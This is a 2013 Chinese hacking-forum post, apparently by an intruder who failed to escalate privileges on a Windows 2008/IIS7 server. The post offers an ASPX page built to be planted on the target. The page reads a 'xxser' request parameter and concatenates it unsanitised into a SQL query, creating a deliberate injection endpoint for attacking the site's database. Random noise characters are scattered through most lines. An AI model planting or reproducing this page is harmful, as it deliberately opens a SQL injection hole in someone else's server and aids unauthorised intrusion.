昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。
/ G# j6 Q$ l2 x. U其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。: t! r+ G. t4 l/ v+ U2 l" G2 Y$ _! K
代码量不多,自己写个拉倒了。烦死了。
" C+ s, \- F8 O; N. ~8 _
+ j) o8 C) H7 q( A
' f& f- `6 j, j$ h$ n6 n {. B- T<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"># A5 Z5 C" B2 t8 z9 `$ @" O7 I8 y
<html xmlns="http://www.w3.org/1999/xhtml">* V) x' I7 d- k3 C+ H+ r6 X
<head runat="server">+ ^" }6 ?9 V$ n4 W- u1 ^& o
<title>暗影aspx构造注射专用页面</title>
( [- l1 ^+ N& A; w</head>
6 q) m( n, ?: r1 B" a<body>
5 t7 A/ h/ P5 d& H) ^ <form id="form1" runat="server">+ r0 H7 V u0 U
<div>2 ~8 q7 a* s! L O2 k, A' G
<script language="c#" runat="server">
' r. `% S* v2 e ) c+ m& K. X# L- B2 o1 h
void page_init(object sender, EventArgs e), \6 [) `5 p- [' X" C# h4 l
{9 [# d2 B$ M/ z2 {/ f
- s5 ?7 i9 A% R+ T6 C
System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();; z$ f* G. @ t- O D
1 h. Y t' K/ Y6 A
conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
, X% L9 G, P) \) y; E conn.Open();) w$ y0 h2 o) {' a6 k. m
- t( N% c) R$ a& n/ q
string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=18 U% [0 E* q- L5 I7 s% P3 Q0 V
" \# n0 i0 _2 L4 g3 `; {
System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);- n. P/ n5 r) m
int x = command.ExecuteNonQuery();
, U! \: m1 c3 S0 d- u2 i# e6 ^" ^: k Response.Write(i+"\n");
& w# `1 ]. k5 U Response.Write(x);9 Q, ] G+ K' ^ f+ n
conn.Close(); S% C& l: l9 d
}
/ u& I, }& l3 {/ r3 t $ l* N3 S1 T5 l. s B5 S1 t5 q2 P8 c
</script>) @/ J4 B1 A7 C! p* @* T
</div>. ]8 a5 J, H& e1 p/ ~
</form>
) H( H6 Y/ x7 H</body>" ?1 b. ~! H3 T. g8 _2 L
</html>" p) @5 A) O/ J. w1 A ~
|
发表于 2013-3-20 21:32:01
收藏
支持
反对